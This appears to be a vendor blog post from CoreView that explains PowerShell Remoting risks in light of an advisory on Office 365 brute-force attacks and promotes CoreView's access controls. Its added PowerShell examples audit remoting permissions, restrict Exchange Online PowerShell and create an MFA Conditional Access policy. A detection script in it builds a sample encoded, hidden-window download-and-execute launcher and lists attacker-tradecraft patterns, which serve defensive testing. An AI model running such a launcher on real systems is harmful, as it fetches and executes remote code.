Earlier this month, the NSA, CISA, FBI, and the UK's NCSC released a joint advisory about ongoing, targeted attacks on organizations using Microsoft Office 365 cloud services.
Specifically, the advisory described a campaign of brute force (password-guessing) attacks against email and user accounts in Microsoft Office 365. Every Office 365 tenant is technically at risk, but the threat is heightened for organizations running hybrid (on-premises plus cloud) environments in sectors such as government, defense, energy, and higher education.
So, what does this mean for IT administrators? What steps should they take to protect their networks and organizations from potential harm? And what does PowerShell access have to do with all of this?
Allow us to explain.
First things first: what is PowerShell? PowerShell is a scripting and automation platform. As Microsoft explains, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework.” It runs on Windows, Linux, and macOS.
In essence, PowerShell is a collection of commands, or cmdlets ("command-lets"), each designed to carry out a specific task. It exists to ease systems administration: an IT professional can run the same command against many servers at once and automate administrative work ranging from the routine to the complex (enabling or disabling a Windows feature, listing the USB devices attached to a machine, or provisioning a new server).
Remote PowerShell access, also known as PowerShell Remoting, lets administrators connect to machines that are not in front of them and run commands on them. On Windows it rides on WinRM (the WS-Management protocol, TCP 5985 for HTTP and 5986 for HTTPS); PowerShell 7 can also remote over SSH. Either way, the point is to manage many servers at once, remotely and automatically.
The aim is to save time and resources, but if that access is left unchecked and unmanaged, the risks are magnified, as the recent advisory highlights.
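What the fan-out described above looks like in practice, together with the check a practitioner wants alongside it (which accounts are permitted to connect to each box). This is an added example, not code from the original post; the server names and the credential prompt are placeholders for your environment, and reading session configurations requires an elevated session on the target.

```powershell
# Added example (not from the original post): run one script block on several
# servers over PowerShell Remoting, and report who may open a remoting session
# on each of them.  Hostnames are assumed placeholders.
$servers = @('srv-app01', 'srv-app02', 'srv-db01')
$cred    = Get-Credential -Message 'Account used for remoting'

# Invoke-Command fans the script block out in parallel (default throttle 32).
# -ErrorAction Continue keeps one unreachable host from aborting the rest.
$results = Invoke-Command -ComputerName $servers -Credential $cred -ErrorAction Continue -ScriptBlock {
    [pscustomobject]@{
        Host      = $env:COMPUTERNAME
        LastBoot  = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
        PSVersion = $PSVersionTable.PSVersion.ToString()
        # Each session configuration is a remoting endpoint; its Permission
        # string is the ACL that decides who can connect to it.
        Endpoints = @(Get-PSSessionConfiguration | Select-Object Name, Permission)
    }
}

# Routine inventory output
$results | Select-Object Host, LastBoot, PSVersion | Format-Table -AutoSize

# Security output: one row per endpoint per host.  Anything beyond
# BUILTIN\Administrators and BUILTIN\Remote Management Users deserves a look.
$results | ForEach-Object {
    $h = $_.Host
    $_.Endpoints | Select-Object @{ n = 'Host'; e = { $h } }, Name, Permission
} | Format-Table -AutoSize
```

To tighten the ACL on a host, adjust the endpoint directly (for example `Set-PSSessionConfiguration -Name Microsoft.PowerShell -ShowSecurityDescriptorUI`) or manage membership of the local Remote Management Users group rather than granting blanket administrator rights.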
We’re glad you asked.
The same ease that lets administrators automate and execute tasks from afar is what makes PowerShell attractive to attackers. Once inside a network, an attacker who can run PowerShell has a full command line with the privileges of the compromised account: access to files and stored data, to the local operating system through .NET and WMI, and, via Remoting, to every other machine that account is allowed to reach. From there they can stage and run malicious commands across the network, often under the radar: PowerShell is a signed Microsoft binary, its activity looks like routine administration, and it leaves little trace unless script block logging and module logging have been switched on.
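The "looks like legitimate administration" problem is exactly why Script Block Logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) matters. The following is an added example, not part of the original post, of a small detector for the tradecraft that tends to appear in attacker-driven PowerShell; it scores script text (so it can be tested offline on the constructed samples below) and then reads the live 4104 events. The indicator list is a starting point, not a complete signature set.

```powershell
# Added example (not from the original post): flag PowerShell script blocks
# carrying common attacker tradecraft, then apply it to Script Block Logging.
function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText)

    # -EncodedCommand hides the interesting part; decode it (UTF-16LE base64,
    # as PowerShell expects) and scan the decoded text as well.
    if ($ScriptText -match '-(e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            $ScriptText += "`n" + $decoded
        } catch { }
    }

    # Indicators commonly seen in malicious launchers and download cradles.
    $indicators = [ordered]@{
        EncodedCommand    = '-(e|en|enc|encodedcommand)\s'
        Base64Decode      = 'FromBase64String'
        HiddenWindow      = '-w(indowstyle)?\s+hidden'
        InvokeExpression  = '\b(iex|Invoke-Expression)\b'
        DownloadCradle    = 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient'
        ReflectionLoad    = '\[System\.Reflection\.Assembly\]::Load'
        AmsiTamper        = 'amsiInitFailed|AmsiScanBuffer'
        NoProfileNonInter = '-nop\b.*-noni\b|-noni\b.*-nop\b'
    }
    $hits = foreach ($name in $indicators.Keys) {
        if ($ScriptText -match $indicators[$name]) { $name }
    }
    [pscustomobject]@{
        Suspicious = [bool]$hits
        Indicators = @($hits)
        Snippet    = $ScriptText.Substring(0, [Math]::Min(80, $ScriptText.Length))
    }
}

# Constructed samples: a routine admin one-liner and a typical encoded launcher
# (built here so the base64 is genuinely what -EncodedCommand would decode).
$benign  = 'Get-Service -Name Spooler | Restart-Service -ErrorAction SilentlyContinue'
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
$hostile = 'powershell.exe -nop -w hidden -noni -enc ' +
           [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))

Test-SuspiciousScriptBlock $benign    # Suspicious = False
Test-SuspiciousScriptBlock $hostile   # Suspicious = True; EncodedCommand, HiddenWindow, InvokeExpression, DownloadCradle, NoProfileNonInter

# Live use: requires Script Block Logging, e.g. via Group Policy or
# HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
#   EnableScriptBlockLogging = 1 (DWORD)
function Get-SuspiciousScriptBlockEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Property index 2 of a 4104 event is ScriptBlockText.
        $r = Test-SuspiciousScriptBlock -ScriptText $_.Properties[2].Value
        if ($r.Suspicious) {
            $r | Add-Member -NotePropertyName Time -NotePropertyValue $_.TimeCreated -PassThru
        }
    }
}
Get-SuspiciousScriptBlockEvents | Format-Table Time, Indicators, Snippet -AutoSize
```

The decode step is the part most simple keyword rules skip: the base64 blob passed to `-enc` is where the download cradle actually lives, so scanning only the outer command line would report the launcher flags but miss what it runs. Because the same engine also produces 4104 events for remoting sessions, this catches commands that arrived through WinRM as well as locally typed ones.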
Yikes is right. But if you’re an administrator wondering how to protect against PowerShell attacks and how to mitigate IT security risks, you’ve come to the right place. Here are three pro tips.
Microsoft offers a number of tools for security administration, from Microsoft Defender to Microsoft Secure Score, which help you assess, detect, and ultimately prevent cyber-attacks (in PowerShell and beyond). That said, they are spread across many portals and interfaces, which makes them hard to track and manage.
CoreView (that's us!) protects and optimizes Microsoft 365 and other SaaS environments. Our platform extends the Microsoft Admin Centers and provides a single bird's-eye view of them all, giving administrators the capacity to quickly and easily manage multiple systems and tools, including security administration and risk assessment. Better yet, CoreView raises automated alerts for security compliance issues in real time.
(Not to brag, but if you're also wondering how to save IT administrators time while reducing risk: one U.S. enterprise reported that CoreView saved its IT team more than 1,000 hours last year in researching and analyzing security-related incidents.)
When it comes to PowerShell specifically, the number one step you should take is to limit who has remote access. In Microsoft 365 that means, for example, leaving Exchange Online PowerShell enabled only for the accounts that actually administer mail, so that a brute-forced user password cannot be turned into a management session. Fortunately, CoreView offers administrators Functional Access Control, or FAC, over Microsoft programs, providing more granular, laser-focused control over who can do what.
As CoreView’s Solution Architect, Matt Smith, explained it — “CoreView’s [Functional Access Control] is checkbox-based. IT can give someone the ability to forward email addresses by clicking two boxes. It is automatically scoped, which is hard to do in the Microsoft world without creating a custom role and creating a custom scope – and frankly, nobody does that… I can also give somebody at the help desk the ability to forward emails to people who are on long-term leave in the accounting department. Boom. We are done.”
CoreView also has a feature called Virtual Tenant, letting administrators segment someone’s visibility by location, region, department, or any other Active Directory attribute. It helps you ensure that someone is able to access exactly the systems, and perform exactly the tasks you’d like them to (e.g. “Person X in Location Y is the only one who can execute Task Z via CoreView”).
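Whatever tool you use to decide who should have it, the Microsoft-side control for Exchange Online is per-user. Here is the underlying procedure as an added example (not code from the original post or from CoreView): enumerate every account that can currently open an Exchange Online PowerShell session, compare it against an explicit allow list, and switch the rest off. It needs the ExchangeOnlineManagement module and an Exchange administrator; the user principal names are placeholders.

```powershell
# Added example (not from the original post or CoreView): restrict Exchange
# Online PowerShell to an allow list of admin accounts.  UPNs are placeholders.
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -UserPrincipalName admin@contoso.example    # assumed admin account

# Accounts that genuinely need the PowerShell endpoint (admins, automation).
$allowed = @('admin@contoso.example', 'exo-automation@contoso.example')

# Everyone outside the allow list who can still connect.  Client-side filtering
# keeps this independent of OPATH filter syntax; it is fine for most tenants.
$enabled = @(Get-User -ResultSize Unlimited |
    Where-Object { $_.RemotePowerShellEnabled -and ($_.UserPrincipalName -notin $allowed) })

"$($enabled.Count) account(s) outside the allow list can open remote PowerShell:"
$enabled | Select-Object DisplayName, UserPrincipalName, RemotePowerShellEnabled | Format-Table -AutoSize

# Dry run first; drop -WhatIf to apply.  RemotePowerShellEnabled only governs
# the PowerShell endpoint; mailbox, Outlook and OWA access are unaffected.
$enabled | ForEach-Object {
    Set-User -Identity $_.UserPrincipalName -RemotePowerShellEnabled $false -WhatIf
}

# Verification: after applying, this should list exactly the allow list.
Get-User -ResultSize Unlimited |
    Where-Object RemotePowerShellEnabled |
    Select-Object UserPrincipalName

Disconnect-ExchangeOnline -Confirm:$false
```

Run the verification step on a schedule as well as once: new users are created with the endpoint enabled unless your provisioning process turns it off, so the allow list drifts over time.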
Additionally, CoreView Custom Actions for Microsoft Office 365 PowerShell commands let administrators execute those commands under a single CoreView service account (protected by Azure Key Vault and your own Conditional Access policies) rather than under individual user accounts, making your network and organization significantly less vulnerable to cyber-attacks.
How so? A Conditional Access policy is essentially an if-then statement: if a user wants to access service X, then condition Y must be met, such as completing multi-factor authentication or signing in from a compliant device. In Microsoft's words, with Conditional Access "you can apply the right access controls when needed to keep your organization secure and stay out of your user's way when not needed."
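One such if-then rule, written out as an added example rather than anything from the original post or CoreView: if anyone signs in to Exchange Online (the service that fronts Exchange Online PowerShell), then they must pass MFA. It uses the Microsoft Graph PowerShell SDK; the break-glass account's object ID is a placeholder, and the policy is created in report-only mode so it can be checked against real sign-in logs before it is enforced.

```powershell
# Added example (not from the original post or CoreView): a Conditional Access
# policy built with the Microsoft Graph PowerShell SDK.
Import-Module Microsoft.Graph.Identity.SignIns
Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'Policy.Read.All'

$breakGlassId   = '00000000-0000-0000-0000-000000000001'   # assumed: emergency-access account object id
$exchangeOnline = '00000002-0000-0ff1-ce00-000000000000'   # well-known app id of Office 365 Exchange Online

$policy = @{
    displayName = 'Require MFA for Exchange Online (incl. remote PowerShell)'
    # Report-only first: sign-in logs show what *would* have happened.
    # Change to 'enabled' once no legitimate automation is caught by it.
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        # IF: any user except the break-glass account ...
        users          = @{ includeUsers = @('All'); excludeUsers = @($breakGlassId) }
        # ... signs in to Exchange Online from any client type
        applications   = @{ includeApplications = @($exchangeOnline) }
        clientAppTypes = @('all')
    }
    # THEN: require multi-factor authentication
    grantControls = @{ operator = 'OR'; builtInControls = @('mfa') }
}

$created = New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
"Created policy $($created.Id) in state $($created.State)"
```

Two caveats a practitioner will want. First, MFA only helps against the brute force campaign in the advisory if the password-guessing traffic actually goes through a flow that can prompt for it: pair this policy with one that blocks legacy authentication (same structure, `clientAppTypes = @('exchangeActiveSync', 'other')` and `builtInControls = @('block')`), otherwise a guessed password still works over basic-auth protocols. Second, a service account like the one Custom Actions uses should be excluded only if it is covered by a stricter policy of its own (for example, a named location or device requirement), never simply exempted.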
Using CoreView, you can ensure these policies are translated and carried out across accounts, systems, and services, including PowerShell. Learn more with a personalized CoreView demo today.